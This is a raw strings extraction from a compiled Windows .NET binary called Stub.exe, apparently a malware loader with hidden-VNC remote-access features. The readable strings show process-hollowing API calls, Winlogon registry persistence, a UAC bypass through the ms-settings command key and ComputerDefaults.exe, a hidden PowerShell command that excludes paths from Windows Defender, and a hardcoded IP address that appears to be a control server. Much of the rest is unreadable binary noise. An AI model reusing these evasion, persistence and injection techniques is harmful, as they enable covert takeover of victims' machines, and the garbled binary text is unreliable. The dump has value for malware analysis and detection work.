!This program cannot be run in DOS mode.
`.rsrc
@.reloc
~oF(*j
lef5E&
9W!=\i
`U\I~E>
GN:q \
*^r8-wP}
M ?dS0'
-Zfzf=7
x8ZJs7
rt46E/14
vlMm`Oz
mXZ-=fo
y<|Urv
}GZ+55
dvDCo>
hbZW;0X
B]:<|&
RuuJ$X
2*^\5t
Y"EP&V
^Z.S]8
ydyZL~
7[w|:&N
V1TfHS
{HQ-@#;
\=6<O3
T&4yHn
T-W;h'
wWW2Ltq
M']JPB6Y}
7-meiP
M9b3zn
z]Yt0q
T&BSJB
v4.0.30319
#Strings
8872D11A1CDB3D7BE4BAE2010F11A89F31AD8E190C62D3C611A7532D649ED811
kernel32
Microsoft.Win32
ToInt32
cbReserved2
lpReserved2
__StaticArrayInitTypeSize=19424
ToInt16
get_UTF8
<Module>
<PrivateImplementationDetails>
DelegateCreateProcessA
LoadLibraryA
KillHVNC
StartHVNC
DESKTOP_JOURNALRECORD
ExclusionWD
SW_HIDE
CCHDEVICENAME
CCHFORMNAME
DESKTOP_ENUMERATE
DESKTOP_JOURNALPLAYBACK
DF_ALLOWOTHERACCOUNTHOOK
DESKTOP_HOOKCONTROL
STARTUP_INFORMATION
PROCESS_INFORMATION
System.IO
DESKTOP_SWITCHDESKTOP
SECURITY_ATTRIBUTES
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
DESKTOP_CREATEMENU
set_IV
DESKTOP_CREATEWINDOW
CreateDesktopW
DecryptData_Data
Decompress_Data
DecryptData
mscorlib
Microsoft.VisualBasic
ThreadId
ProcessId
GetProcessById
bytesRead
DelegateResumeThread
thread
IsInstalled
lpReserved
method
device
deviceMode
FileMode
CryptoStreamMode
CompressionMode
EndInvoke
BeginInvoke
IDisposable
compatible
ThreadHandle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
bInheritHandle
handle
InstallFile
lpTitle
get_MainModule
ProcessModule
get_Name
get_FileName
get_FullName
applicationName
desktopName
DirectoryName
filename
commandLine
Combine
ValueType
MethodBase
Dispose
Create
MulticastDelegate
SetApartmentState
Delete
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
dLByte
GetValue
SetValue
Stub.exe
dwXSize
dwYSize
get_Size
bufferSize
SizeOf
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
Substring
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
nLength
length
LoadApi
CreateApi
AsyncCallback
callback
accessMask
Marshal
kernel32.dll
user32.dll
FileStream
CryptoStream
GZipStream
MemoryStream
Program
System
SymmetricAlgorithm
ICryptoTransform
hidden
bytesWritten
System.IO.Compression
Application
processInformation
DelegateZwUnmapViewOfSection
System.Reflection
set_Position
Exception
HandleRun
TryRun
MethodInfo
FileInfo
FileSystemInfo
startupInfo
ParameterInfo
DirectoryInfo
CreateDesktop
lpDesktop
hNewDesktop
SpecialFolder
folder
Buffer
buffer
Identifier
Installer
CurrentUser
ToGenericParameter
GetDelegateForFunctionPointer
BitConverter
hStdError
.cctor
lpSecurityDescriptor
CreateDecryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
DebuggingModes
inheritHandles
GetProcesses
set_Attributes
threadAttributes
FileAttributes
processAttributes
attributes
ReadAllBytes
GetBytes
creationFlags
dwFlags
System.Windows.Forms
Contains
Conversions
dwXCountChars
dwYCountChars
RuntimeHelpers
GetParameters
FileAccess
hProcess
process
GetProcAddress
baseAddress
address
Decompress
get_Exists
Concat
Object
object
protect
op_Explicit
IAsyncResult
result
Environment
environment
get_EntryPoint
ParameterizedThreadStart
Convert
ipport
hStdInput
hStdOutput
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
GetConsoleWindow
wShowWindow
nCmdShow
DelegateVirtualAllocEx
InitializeArray
ToArray
set_Key
CreateSubKey
OpenSubKey
GetRegKey
RegistryKey
System.Security.Cryptography
Assembly
BlockCopy
DelegateReadProcessMemory
DelegateWriteProcessMemory
CreateDirectory
currentDirectory
InstallRegistry
op_Equality
IsNullOrEmpty
WrapNonExceptionThrows
Copyright
2021
$835bcf68-5f0d-428b-bf86-f859a34555d8
1.0.0.0
.NETFramework,Version=v4.5.2
FrameworkDisplayName
.NET Framework 4.5.2
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
RemoteDesktop
Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c
explorer.exe,
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=
Software\Classes\ms-settings\shell\open\command
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '
DelegateExecute
C:\Windows\System32\ComputerDefaults.exe
193.142.146.64
Default
VOerOCQof
fOWeBGYAp
TxTKzZWFO.exe
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0